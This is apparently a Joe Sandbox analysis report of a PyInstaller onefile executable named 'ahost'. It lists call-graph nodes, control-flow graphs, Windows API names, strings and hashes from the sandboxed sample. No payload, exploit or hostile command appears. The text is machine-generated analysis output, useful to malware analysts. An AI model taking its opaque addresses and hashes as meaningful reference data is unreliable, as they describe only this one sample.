54 API calls 18616->18617 18617->18615 18619 7ff7f91e658c 18618->18619 18620 7ff7f91e659d 18618->18620 18621 7ff7f91e2710 54 API calls 18619->18621 18622 7ff7f91e65ac 18620->18622 18623 7ff7f91e65bd 18620->18623 18621->18615 18625 7ff7f91e2710 54 API calls 18622->18625 18764 7ff7f91e4d40 18623->18764 18625->18615 18642 7ff7f91e6060 18641->18642 18642->18642 18643 7ff7f91e6089 18642->18643 18648 7ff7f91e60a0 __std_exception_destroy 18642->18648 18644 7ff7f91e2710 54 API calls 18643->18644 18645 7ff7f91e6095 18644->18645 18645->16776 18646 7ff7f91e61ab 18646->16776 18647 7ff7f91e1470 116 API calls 18647->18648 18648->18646 18648->18647 18649 7ff7f91e2710 54 API calls 18648->18649 18649->18648 18651 7ff7f91e6225 18650->18651 18654 7ff7f91e61fc 18650->18654 18654->18651 18664 7ff7f91e586f GetProcAddress 18663->18664 18665 7ff7f91e5842 GetLastError 18663->18665 18667 7ff7f91e588b GetLastError 18664->18667 18668 7ff7f91e589a GetProcAddress 18664->18668 18666 7ff7f91e584f 18665->18666 18671 7ff7f91e2c50 51 API calls 18666->18671 18667->18666 18669 7ff7f91e58b6 GetLastError 18668->18669 18670 7ff7f91e58c5 GetProcAddress 18668->18670 18669->18666 18672 7ff7f91e58f3 GetProcAddress 18670->18672 18673 7ff7f91e58e1 GetLastError 18670->18673 18674 7ff7f91e5864 18671->18674 18675 7ff7f91e590f GetLastError 18672->18675 18676 7ff7f91e5921 GetProcAddress 18672->18676 18673->18666 18674->18603 18675->18666 18677 7ff7f91e594f GetProcAddress 18676->18677 18678 7ff7f91e593d GetLastError 18676->18678 18679 7ff7f91e596b GetLastError 18677->18679 18680 7ff7f91e597d GetProcAddress 18677->18680 18678->18666 18679->18680 18681 7ff7f91e59ab GetProcAddress 18680->18681 18756 7ff7f91e541c 18753->18756 18754 7ff7f91e5424 18754->18606 18755 7ff7f91e55c4 18757 7ff7f91e5787 __std_exception_destroy 18755->18757 18758 7ff7f91e47c0 47 API calls 18755->18758 18756->18754 18756->18755 18784 7ff7f91f6b14 18756->18784 18757->18606 18758->18755 18761 7ff7f91e4cb0 18760->18761 18762 7ff7f91ec5c0 _log10_special 8 API calls 18761->18762 18763 7ff7f91e4d1a 18762->18763 18763->18612 18763->18613 18765 7ff7f91e4d55 18764->18765 18766 7ff7f91e1c80 49 API calls 18765->18766 18785 7ff7f91f6b44 18784->18785 18788 7ff7f91f6010 18785->18788 18787 7ff7f91f6b74 18787->18756 18789 7ff7f91f6041 18788->18789 18791 7ff7f91f6053 18788->18791 18790 7ff7f91f4f78 _get_daylight 11 API calls 18789->18790 18794 7ff7f91f6046 18790->18794 18793 7ff7f91f609d 18791->18793 18795 7ff7f91f6060 18791->18795 18792 7ff7f91f60b8 18801 7ff7f91f60da 18792->18801 18809 7ff7f91f6a9c 18792->18809 18793->18792 18796 7ff7f91f4830 45 API calls 18793->18796 18798 7ff7f91fa950 _invalid_parameter_noinfo 37 API calls 18794->18798 18799 7ff7f91fa884 _invalid_parameter_noinfo 37 API calls 18795->18799 18796->18792 18804 7ff7f91f6051 18798->18804 18799->18804 18800 7ff7f91f617b 18803 7ff7f91f4f78 _get_daylight 11 API calls 18800->18803 18800->18804 18801->18800 18802 7ff7f91f4f78 _get_daylight 11 API calls 18801->18802 18805 7ff7f91f6170 18802->18805 18806 7ff7f91f6226 18803->18806 18804->18787 18807 7ff7f91fa950 _invalid_parameter_noinfo 37 API calls 18805->18807 18808 7ff7f91fa950 _invalid_parameter_noinfo 37 API calls 18806->18808 18807->18800 18808->18804 18810 7ff7f91f6abf 18809->18810 18812 7ff7f91f6ad6 18809->18812 18815 7ff7f91fffd8 18810->18815 18813 7ff7f91f6ac4 18812->18813 18820 7ff7f9200008 18812->18820 18813->18792 18816 7ff7f91fb1c0 __GetCurrentState 45 API calls 18815->18816 18817 7ff7f91fffe1 18816->18817 18818 7ff7f91fd9f4 45 API calls 18817->18818 18819 7ff7f91ffffa 18818->18819 18819->18813 18821 7ff7f91f4fbc 45 API calls 18820->18821 18823 7ff7f9200041 18821->18823 18822 7ff7f920004d 18824 7ff7f91ec5c0 _log10_special 8 API calls 18822->18824 18823->18822 18827 7ff7f9202eb0 18823->18827 18826 7ff7f92000f7 18824->18826 18826->18813 18828 7ff7f91f4fbc 45 API calls 18827->18828 18829 7ff7f9202ef2 18828->18829 18861->16781 19100 7ff7f91f5480 19101 7ff7f91f548b 19100->19101 19109 7ff7f91ff314 19101->19109 19122 7ff7f9200348 EnterCriticalSection 19109->19122 20617 7ff7f91ff9fc 20618 7ff7f91ffbee 20617->20618 20620 7ff7f91ffa3e _isindst 20617->20620 20619 7ff7f91f4f78 _get_daylight 11 API calls 20618->20619 20637 7ff7f91ffbde 20619->20637 20620->20618 20623 7ff7f91ffabe _isindst 20620->20623 20621 7ff7f91ec5c0 _log10_special 8 API calls 20622 7ff7f91ffc09 20621->20622 20638 7ff7f9206204 20623->20638 20628 7ff7f91ffc1a 20630 7ff7f91fa970 _isindst 17 API calls 20628->20630 20632 7ff7f91ffc2e 20630->20632 20635 7ff7f91ffb1b 20635->20637 20663 7ff7f9206248 20635->20663 20637->20621 20639 7ff7f9206213 20638->20639 20640 7ff7f91ffadc 20638->20640 20670 7ff7f9200348 EnterCriticalSection 20639->20670 20645 7ff7f9205608 20640->20645 20646 7ff7f9205611 20645->20646 20647 7ff7f91ffaf1 20645->20647 20648 7ff7f91f4f78 _get_daylight 11 API calls 20646->20648 20647->20628 20651 7ff7f9205638 20647->20651 20649 7ff7f9205616 20648->20649 20650 7ff7f91fa950 _invalid_parameter_noinfo 37 API calls 20649->20650 20650->20647 20652 7ff7f9205641 20651->20652 20653 7ff7f91ffb02 20651->20653 20654 7ff7f91f4f78 _get_daylight 11 API calls 20652->20654 20653->20628 20657 7ff7f9205668 20653->20657 20655 7ff7f9205646 20654->20655 20656 7ff7f91fa950 _invalid_parameter_noinfo 37 API calls 20655->20656 20656->20653 20658 7ff7f9205671 20657->20658 20659 7ff7f91ffb13 20657->20659 20660 7ff7f91f4f78 _get_daylight 11 API calls 20658->20660 20659->20628 20659->20635 20661 7ff7f9205676 20660->20661 20662 7ff7f91fa950 _invalid_parameter_noinfo 37 API calls 20661->20662 20662->20659 20671 7ff7f9200348 EnterCriticalSection 20663->20671 19132 7ff7f9207c90 19135 7ff7f9202660 19132->19135 19136 7ff7f920266d 19135->19136 19137 7ff7f92026b2 19135->19137 19141 7ff7f91fb294 19136->19141 19142 7ff7f91fb2a5 FlsGetValue 19141->19142 19143 7ff7f91fb2c0 FlsSetValue 19141->19143 19144 7ff7f91fb2b2 19142->19144 19146 7ff7f91fb2ba 19142->19146 19143->19144 19145 7ff7f91fb2cd 19143->19145 19148 7ff7f91fb2b8 19144->19148 19149 7ff7f91fa574 __GetCurrentState 45 API calls 19144->19149 19147 7ff7f91fec08 _get_daylight 11 API calls 19145->19147 19146->19143 19151 7ff7f91fb2dc 19147->19151 19161 7ff7f9202334 19148->19161 19150 7ff7f91fb335 19149->19150 19152 7ff7f91fb2fa FlsSetValue 19151->19152 19153 7ff7f91fb2ea FlsSetValue 19151->19153 19155 7ff7f91fb306 FlsSetValue 19152->19155 19156 7ff7f91fb318 19152->19156 19154 7ff7f91fb2f3 19153->19154 19157 7ff7f91fa9b8 __free_lconv_mon 11 API calls 19154->19157 19155->19154 19158 7ff7f91faf64 _get_daylight 11 API calls 19156->19158 19157->19144 19159 7ff7f91fb320 19158->19159 19160 7ff7f91fa9b8 __free_lconv_mon 11 API calls 19159->19160 19160->19148 19184 7ff7f92025a4 19161->19184 19163 7ff7f9202369 19199 7ff7f9202034 19163->19199 19166 7ff7f91fd66c _fread_nolock 12 API calls 19167 7ff7f9202397 19166->19167 19168 7ff7f920239f 19167->19168 19171 7ff7f92023ae 19167->19171 19169 7ff7f91fa9b8 __free_lconv_mon 11 API calls 19168->19169 19170 7ff7f9202386 19169->19170 19170->19137 19206 7ff7f92026dc 19171->19206 19174 7ff7f92024aa 19175 7ff7f91f4f78 _get_daylight 11 API calls 19174->19175 19176 7ff7f92024af 19175->19176 19179 7ff7f91fa9b8 __free_lconv_mon 11 API calls 19176->19179 19177 7ff7f9202505 19178 7ff7f920256c 19177->19178 19217 7ff7f9201e64 19177->19217 19182 7ff7f91fa9b8 __free_lconv_mon 11 API calls 19178->19182 19179->19170 19180 7ff7f92024c4 19180->19177 19183 7ff7f91fa9b8 __free_lconv_mon 11 API calls 19180->19183 19182->19170 19183->19177 19185 7ff7f92025c7 19184->19185 19186 7ff7f92025d1 19185->19186 19232 7ff7f9200348 EnterCriticalSection 19185->19232 19188 7ff7f9202643 19186->19188 19190 7ff7f91fa574 __GetCurrentState 45 API calls 19186->19190 19188->19163 19192 7ff7f920265b 19190->19192 19195 7ff7f91fb294 50 API calls 19192->19195 19198 7ff7f92026b2 19192->19198 19196 7ff7f920269c 19195->19196 19197 7ff7f9202334 65 API calls 19196->19197 19197->19198 19198->19163 19200 7ff7f91f4fbc 45 API calls 19199->19200 19201 7ff7f9202048 19200->19201 19202 7ff7f9202066 19201->19202 19203 7ff7f9202054 GetOEMCP 19201->19203 19204 7ff7f920206b GetACP 19202->19204 19205 7ff7f920207b 19202->19205 19203->19205 19204->19205 19205->19166 19205->19170 19207 7ff7f9202034 47 API calls 19206->19207 19208 7ff7f9202709 19207->19208 19210 7ff7f9202746 IsValidCodePage 19208->19210 19215 7ff7f920285f 19208->19215 19216 7ff7f9202760 memcpy_s 19208->19216 19209 7ff7f91ec5c0 _log10_special 8 API calls 19211 7ff7f92024a1 19209->19211 19212 7ff7f9202757 19210->19212 19210->19215 19211->19174 19211->19180 19213 7ff7f9202786 GetCPInfo 19212->19213 19212->19216 19213->19215 19213->19216 19215->19209 19233 7ff7f920214c 19216->19233 19299 7ff7f9200348 EnterCriticalSection 19217->19299 19234 7ff7f9202189 GetCPInfo 19233->19234 19243 7ff7f920227f 19233->19243 19235 7ff7f920219c 19234->19235 19234->19243 19237 7ff7f9202eb0 48 API calls 19235->19237 19236 7ff7f91ec5c0 _log10_special 8 API calls 19238 7ff7f920231e 19236->19238 19239 7ff7f9202213 19237->19239 19238->19215 19244 7ff7f9207bf4 19239->19244 19242 7ff7f9207bf4 54 API calls 19242->19243 19243->19236 19245 7ff7f91f4fbc 45 API calls 19244->19245 19246 7ff7f9207c19 19245->19246 19249 7ff7f92078c0 19246->19249 19250 7ff7f9207901 19249->19250 19251 7ff7f91ff910 _fread_nolock MultiByteToWideChar 19250->19251 19254 7ff7f920794b 19251->19254 19252 7ff7f9207bc9 19253 7ff7f91ec5c0 _log10_special 8 API calls 19252->19253 19255 7ff7f9202246 19253->19255 19254->19252 19256 7ff7f9207a81 19254->19256 19257 7ff7f91fd66c _fread_nolock 12 API calls 19254->19257 19259 7ff7f9207983 19254->19259 19255->19242 19256->19252 19258 7ff7f91fa9b8 __free_lconv_mon 11 API calls 19256->19258 19257->19259 19258->19252 19259->19256 19260 7ff7f91ff910 _fread_nolock MultiByteToWideChar 19259->19260 19261 7ff7f92079f6 19260->19261 19261->19256 19280 7ff7f91ff154 19261->19280 19264 7ff7f9207a92 19266 7ff7f91fd66c _fread_nolock 12 API calls 19264->19266 19268 7ff7f9207b64 19264->19268 19269 7ff7f9207ab0 19264->19269 19265 7ff7f9207a41 19265->19256 19267 7ff7f91ff154 __crtLCMapStringW 6 API calls 19265->19267 19266->19269 19267->19256 19268->19256 19270 7ff7f91fa9b8 __free_lconv_mon 11 API calls 19268->19270 19269->19256 19271 7ff7f91ff154 __crtLCMapStringW 6 API calls 19269->19271 19270->19256 19272 7ff7f9207b30 19271->19272 19272->19268 19273 7ff7f9207b66 19272->19273 19274 7ff7f9207b50 19272->19274 19275 7ff7f9200858 WideCharToMultiByte 19273->19275 19276 7ff7f9200858 WideCharToMultiByte 19274->19276 19277 7ff7f9207b5e 19275->19277 19276->19277 19277->19268 19278 7ff7f9207b7e 19277->19278 19278->19256 19279 7ff7f91fa9b8 __free_lconv_mon 11 API calls 19278->19279 19279->19256 19286 7ff7f91fed80 19280->19286 19283 7ff7f91ff19a 19283->19256 19283->19264 19283->19265 19285 7ff7f91ff203 LCMapStringW 19285->19283 19287 7ff7f91feddd 19286->19287 19294 7ff7f91fedd8 __vcrt_InitializeCriticalSectionEx 19286->19294 19287->19283 19296 7ff7f91ff240 19287->19296 19288 7ff7f91fee0d LoadLibraryExW 19290 7ff7f91feee2 19288->19290 19291 7ff7f91fee32 GetLastError 19288->19291 19289 7ff7f91fef02 GetProcAddress 19289->19287 19293 7ff7f91fef13 19289->19293 19290->19289 19292 7ff7f91feef9 FreeLibrary 19290->19292 19291->19294 19292->19289 19293->19287 19294->19287 19294->19288 19294->19289 19295 7ff7f91fee6c LoadLibraryExW 19294->19295 19295->19290 19295->19294 19297 7ff7f91fed80 __crtLCMapStringW 5 API calls 19296->19297 19298 7ff7f91ff26e __crtLCMapStringW 19297->19298 19298->19285 20439 7ff7f91fc590 20450 7ff7f9200348 EnterCriticalSection 20439->20450 19309 7ff7f920ae6e 19310 7ff7f920ae87 19309->19310 19311 7ff7f920ae7d 19309->19311 19313 7ff7f92003a8 LeaveCriticalSection 19311->19313 20746 7ff7f920add9 20749 7ff7f91f54e8 LeaveCriticalSection 20746->20749

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 0 7ff7f91e8bd0-7ff7f91e8d16 call 7ff7f91ec8c0 call 7ff7f91e9400 SetConsoleCtrlHandler GetStartupInfoW call 7ff7f91f5460 call 7ff7f91fa4ec call 7ff7f91f878c call 7ff7f91f5460 call 7ff7f91fa4ec call 7ff7f91f878c call 7ff7f91f5460 call 7ff7f91fa4ec call 7ff7f91f878c GetCommandLineW CreateProcessW 23 7ff7f91e8d3d-7ff7f91e8d79 RegisterClassW 0->23 24 7ff7f91e8d18-7ff7f91e8d38 GetLastError call 7ff7f91e2c50 0->24 26 7ff7f91e8d81-7ff7f91e8dd5 CreateWindowExW 23->26 27 7ff7f91e8d7b GetLastError 23->27 31 7ff7f91e9029-7ff7f91e904f call 7ff7f91ec5c0 24->31 29 7ff7f91e8ddf-7ff7f91e8de4 ShowWindow 26->29 30 7ff7f91e8dd7-7ff7f91e8ddd GetLastError 26->30 27->26 32 7ff7f91e8dea-7ff7f91e8dfa WaitForSingleObject 29->32 30->32 34 7ff7f91e8dfc 32->34 35 7ff7f91e8e78-7ff7f91e8e7f 32->35 39 7ff7f91e8e00-7ff7f91e8e03 34->39 36 7ff7f91e8e81-7ff7f91e8e91 WaitForSingleObject 35->36 37 7ff7f91e8ec2-7ff7f91e8ec9 35->37 40 7ff7f91e8e97-7ff7f91e8ea7 TerminateProcess 36->40 41 7ff7f91e8fe8-7ff7f91e8ff2 36->41 42 7ff7f91e8ecf-7ff7f91e8ee5 QueryPerformanceFrequency QueryPerformanceCounter 37->42 43 7ff7f91e8fb0-7ff7f91e8fc9 GetMessageW 37->43 44 7ff7f91e8e05 GetLastError 39->44 45 7ff7f91e8e0b-7ff7f91e8e12 39->45 50 7ff7f91e8eaf-7ff7f91e8ebd WaitForSingleObject 40->50 51 7ff7f91e8ea9 GetLastError 40->51 48 7ff7f91e8ff4-7ff7f91e8ffa DestroyWindow 41->48 49 7ff7f91e9001-7ff7f91e9025 GetExitCodeProcess CloseHandle * 2 41->49 52 7ff7f91e8ef0-7ff7f91e8f28 MsgWaitForMultipleObjects PeekMessageW 42->52 46 7ff7f91e8fdf-7ff7f91e8fe6 43->46 47 7ff7f91e8fcb-7ff7f91e8fd9 TranslateMessage DispatchMessageW 43->47 44->45 45->36 53 7ff7f91e8e14-7ff7f91e8e31 PeekMessageW 45->53 46->41 46->43 47->46 48->49 49->31 50->41 51->50 54 7ff7f91e8f63-7ff7f91e8f6a 52->54 55 7ff7f91e8f2a 52->55 56 7ff7f91e8e66-7ff7f91e8e76 WaitForSingleObject 53->56 57 7ff7f91e8e33-7ff7f91e8e64 TranslateMessage DispatchMessageW PeekMessageW 53->57 54->43 59 7ff7f91e8f6c-7ff7f91e8f95 QueryPerformanceCounter 54->59 58 7ff7f91e8f30-7ff7f91e8f61 TranslateMessage DispatchMessageW PeekMessageW 55->58 56->35 56->39 57->56 57->57 58->54 58->58 59->52 60 7ff7f91e8f9b-7ff7f91e8fa2 59->60 60->41 61 7ff7f91e8fa4-7ff7f91e8fa8 60->61 61->43
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
                                                                                                                                                                                                                              • String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
                                                                                                                                                                                                                              • API String ID: 3832162212-3165540532
                                                                                                                                                                                                                              • Opcode ID: f1b4a1f9842ac9cce6b2798ee34386867a7882a0850fd65476f94626d3f01840
                                                                                                                                                                                                                              • Instruction ID: 7bda02531730b8b89590b024f1c7978ae2ea06bbc3aa9d10b1d93ce67a436a7b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f1b4a1f9842ac9cce6b2798ee34386867a7882a0850fd65476f94626d3f01840
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D6D15331E08A4686FB60AF34EC542ADB774FB84B58F900235DA6E536E8DF3CE5458790

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 62 7ff7f91e1000-7ff7f91e3806 call 7ff7f91efe88 call 7ff7f91efe90 call 7ff7f91ec8c0 call 7ff7f91f5460 call 7ff7f91f54f4 call 7ff7f91e36b0 76 7ff7f91e3814-7ff7f91e3836 call 7ff7f91e1950 62->76 77 7ff7f91e3808-7ff7f91e380f 62->77 82 7ff7f91e383c-7ff7f91e3856 call 7ff7f91e1c80 76->82 83 7ff7f91e391b-7ff7f91e3931 call 7ff7f91e45b0 76->83 79 7ff7f91e3c97-7ff7f91e3cb2 call 7ff7f91ec5c0 77->79 87 7ff7f91e385b-7ff7f91e389b call 7ff7f91e8a20 82->87 90 7ff7f91e3933-7ff7f91e3960 call 7ff7f91e7f80 83->90 91 7ff7f91e396a-7ff7f91e397f call 7ff7f91e2710 83->91 96 7ff7f91e38c1-7ff7f91e38cc call 7ff7f91f4fa0 87->96 97 7ff7f91e389d-7ff7f91e38a3 87->97 103 7ff7f91e3984-7ff7f91e39a6 call 7ff7f91e1c80 90->103 104 7ff7f91e3962-7ff7f91e3965 call 7ff7f91f00bc 90->104 99 7ff7f91e3c8f 91->99 111 7ff7f91e38d2-7ff7f91e38e1 call 7ff7f91e8a20 96->111 112 7ff7f91e39fc-7ff7f91e3a2a call 7ff7f91e8b30 call 7ff7f91e8b90 * 3 96->112 100 7ff7f91e38a5-7ff7f91e38ad 97->100 101 7ff7f91e38af-7ff7f91e38bd call 7ff7f91e8b90 97->101 99->79 100->101 101->96 115 7ff7f91e39b0-7ff7f91e39b9 103->115 104->91 119 7ff7f91e39f4-7ff7f91e39f7 call 7ff7f91f4fa0 111->119 120 7ff7f91e38e7-7ff7f91e38ed 111->120 138 7ff7f91e3a2f-7ff7f91e3a3e call 7ff7f91e8a20 112->138 115->115 118 7ff7f91e39bb-7ff7f91e39d8 call 7ff7f91e1950 115->118 118->87 130 7ff7f91e39de-7ff7f91e39ef call 7ff7f91e2710 118->130 119->112 123 7ff7f91e38f0-7ff7f91e38fc 120->123 127 7ff7f91e3905-7ff7f91e3908 123->127 128 7ff7f91e38fe-7ff7f91e3903 123->128 127->119 131 7ff7f91e390e-7ff7f91e3916 call 7ff7f91f4fa0 127->131 128->123 128->127 130->99 131->138 141 7ff7f91e3a44-7ff7f91e3a47 138->141 142 7ff7f91e3b45-7ff7f91e3b53 138->142 141->142 145 7ff7f91e3a4d-7ff7f91e3a50 141->145 143 7ff7f91e3a67 142->143 144 7ff7f91e3b59-7ff7f91e3b5d 142->144 146 7ff7f91e3a6b-7ff7f91e3a90 call 7ff7f91f4fa0 143->146 144->146 147 7ff7f91e3b14-7ff7f91e3b17 145->147 148 7ff7f91e3a56-7ff7f91e3a5a 145->148 156 7ff7f91e3a92-7ff7f91e3aa6 call 7ff7f91e8b30 146->156 157 7ff7f91e3aab-7ff7f91e3ac0 146->157 151 7ff7f91e3b2f-7ff7f91e3b40 call 7ff7f91e2710 147->151 152 7ff7f91e3b19-7ff7f91e3b1d 147->152 148->147 150 7ff7f91e3a60 148->150 150->143 160 7ff7f91e3c7f-7ff7f91e3c87 151->160 152->151 153 7ff7f91e3b1f-7ff7f91e3b2a 152->153 153->146 156->157 161 7ff7f91e3ac6-7ff7f91e3aca 157->161 162 7ff7f91e3be8-7ff7f91e3bfa call 7ff7f91e8a20 157->162 160->99 164 7ff7f91e3ad0-7ff7f91e3ae8 call 7ff7f91f52c0 161->164 165 7ff7f91e3bcd-7ff7f91e3be2 call 7ff7f91e1940 161->165 170 7ff7f91e3bfc-7ff7f91e3c02 162->170 171 7ff7f91e3c2e 162->171 175 7ff7f91e3b62-7ff7f91e3b7a call 7ff7f91f52c0 164->175 176 7ff7f91e3aea-7ff7f91e3b02 call 7ff7f91f52c0 164->176 165->161 165->162 173 7ff7f91e3c04-7ff7f91e3c1c 170->173 174 7ff7f91e3c1e-7ff7f91e3c2c 170->174 177 7ff7f91e3c31-7ff7f91e3c40 call 7ff7f91f4fa0 171->177 173->177 174->177 184 7ff7f91e3b7c-7ff7f91e3b80 175->184 185 7ff7f91e3b87-7ff7f91e3b9f call 7ff7f91f52c0 175->185 176->165 186 7ff7f91e3b08-7ff7f91e3b0f 176->186 187 7ff7f91e3c46-7ff7f91e3c4a 177->187 188 7ff7f91e3d41-7ff7f91e3d63 call 7ff7f91e44d0 177->188 184->185 201 7ff7f91e3ba1-7ff7f91e3ba5 185->201 202 7ff7f91e3bac-7ff7f91e3bc4 call 7ff7f91f52c0 185->202 186->165 189 7ff7f91e3cd4-7ff7f91e3ce6 call 7ff7f91e8a20 187->189 190 7ff7f91e3c50-7ff7f91e3c5f call 7ff7f91e90e0 187->190 199 7ff7f91e3d65-7ff7f91e3d6f call 7ff7f91e4620 188->199 200 7ff7f91e3d71-7ff7f91e3d82 call 7ff7f91e1c80 188->200 205 7ff7f91e3d35-7ff7f91e3d3c 189->205 206 7ff7f91e3ce8-7ff7f91e3ceb 189->206 203 7ff7f91e3cb3-7ff7f91e3cb6 call 7ff7f91e8850 190->203 204 7ff7f91e3c61 190->204 214 7ff7f91e3d87-7ff7f91e3d96 199->214 200->214 201->202 202->165 216 7ff7f91e3bc6 202->216 221 7ff7f91e3cbb-7ff7f91e3cbd 203->221 211 7ff7f91e3c68 call 7ff7f91e2710 204->211 205->211 206->205 212 7ff7f91e3ced-7ff7f91e3d10 call 7ff7f91e1c80 206->212 222 7ff7f91e3c6d-7ff7f91e3c77 211->222 228 7ff7f91e3d12-7ff7f91e3d26 call 7ff7f91e2710 call 7ff7f91f4fa0 212->228 229 7ff7f91e3d2b-7ff7f91e3d33 call 7ff7f91f4fa0 212->229 219 7ff7f91e3dc4-7ff7f91e3dda call 7ff7f91e9400 214->219 220 7ff7f91e3d98-7ff7f91e3d9f 214->220 216->165 232 7ff7f91e3ddc 219->232 233 7ff7f91e3de8-7ff7f91e3e04 SetDllDirectoryW 219->233 220->219 224 7ff7f91e3da1-7ff7f91e3da5 220->224 226 7ff7f91e3cbf-7ff7f91e3cc6 221->226 227 7ff7f91e3cc8-7ff7f91e3ccf 221->227 222->160 224->219 230 7ff7f91e3da7-7ff7f91e3dbe SetDllDirectoryW LoadLibraryExW 224->230 226->211 227->214 228->222 229->214 230->219 232->233 236 7ff7f91e3f01-7ff7f91e3f08 233->236 237 7ff7f91e3e0a-7ff7f91e3e19 call 7ff7f91e8a20 233->237 242 7ff7f91e3ffc-7ff7f91e4004 236->242 243 7ff7f91e3f0e-7ff7f91e3f15 236->243 251 7ff7f91e3e32-7ff7f91e3e3c call 7ff7f91f4fa0 237->251 252 7ff7f91e3e1b-7ff7f91e3e21 237->252 244 7ff7f91e4006-7ff7f91e4023 PostMessageW GetMessageW 242->244 245 7ff7f91e4029-7ff7f91e405b call 7ff7f91e36a0 call 7ff7f91e3360 call 7ff7f91e3670 call 7ff7f91e6fb0 call 7ff7f91e6d60 242->245 243->242 248 7ff7f91e3f1b-7ff7f91e3f25 call 7ff7f91e33c0 243->248 244->245 248->222 258 7ff7f91e3f2b-7ff7f91e3f3f call 7ff7f91e90c0 248->258 263 7ff7f91e3ef2-7ff7f91e3efc call 7ff7f91e8b30 251->263 264 7ff7f91e3e42-7ff7f91e3e48 251->264 255 7ff7f91e3e23-7ff7f91e3e2b 252->255 256 7ff7f91e3e2d-7ff7f91e3e2f 252->256 255->256 256->251 269 7ff7f91e3f64-7ff7f91e3fa0 call 7ff7f91e8b30 call 7ff7f91e8bd0 call 7ff7f91e6fb0 call 7ff7f91e6d60 call 7ff7f91e8ad0 258->269 270 7ff7f91e3f41-7ff7f91e3f5e PostMessageW GetMessageW 258->270 263->236 264->263 268 7ff7f91e3e4e-7ff7f91e3e54 264->268 272 7ff7f91e3e56-7ff7f91e3e58 268->272 273 7ff7f91e3e5f-7ff7f91e3e61 268->273 304 7ff7f91e3fa5-7ff7f91e3fa7 269->304 270->269 274 7ff7f91e3e67-7ff7f91e3e83 call 7ff7f91e6db0 call 7ff7f91e7330 272->274 277 7ff7f91e3e5a 272->277 273->236 273->274 289 7ff7f91e3e85-7ff7f91e3e8c 274->289 290 7ff7f91e3e8e-7ff7f91e3e95 274->290 277->236 292 7ff7f91e3edb-7ff7f91e3ef0 call 7ff7f91e2a50 call 7ff7f91e6fb0 call 7ff7f91e6d60 289->292 293 7ff7f91e3eaf-7ff7f91e3eb9 call 7ff7f91e71a0 290->293 294 7ff7f91e3e97-7ff7f91e3ea4 call 7ff7f91e6df0 290->294 292->236 307 7ff7f91e3ec4-7ff7f91e3ed2 call 7ff7f91e74e0 293->307 308 7ff7f91e3ebb-7ff7f91e3ec2 293->308 294->293 306 7ff7f91e3ea6-7ff7f91e3ead 294->306 309 7ff7f91e3fe9-7ff7f91e3ff7 call 7ff7f91e1900 304->309 310 7ff7f91e3fa9-7ff7f91e3fb3 call 7ff7f91e9200 304->310 306->292 307->236 318 7ff7f91e3ed4 307->318 308->292 309->222 310->309 321 7ff7f91e3fb5-7ff7f91e3fca 310->321 318->292 322 7ff7f91e3fe4 call 7ff7f91e2a50 321->322 323 7ff7f91e3fcc-7ff7f91e3fdf call 7ff7f91e2710 call 7ff7f91e1900 321->323 322->309 323->222
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorFileLastModuleName
